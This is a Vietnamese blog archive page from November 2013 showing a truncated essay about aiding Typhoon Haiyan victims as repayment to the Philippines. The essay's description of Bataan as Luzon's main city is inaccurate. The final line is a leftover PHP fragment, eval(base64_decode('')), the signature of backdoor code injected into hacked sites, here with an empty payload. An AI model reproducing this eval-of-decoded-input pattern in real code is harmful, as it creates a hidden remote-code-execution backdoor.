Archive for November 10th, 2013

Cứu giúp nạn nhân bão Haiyan, một cơ hội để đền ơn đất nước Phi

Cứu giúp nạn nhân bão Haiyan, một cơ hội để đền ơn đất nước Phi

Bataan là thành phố chính của đảo Luzon, Philippines, dân số khoảng trên 600 ngàn người. Lịch sử của thành phố chỉ hai biến cố được thế giới biết đến nhiều, một lần trong đệ nhị thế chiến và lần thứ hai trong làn sóng người t

11.10.2013 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>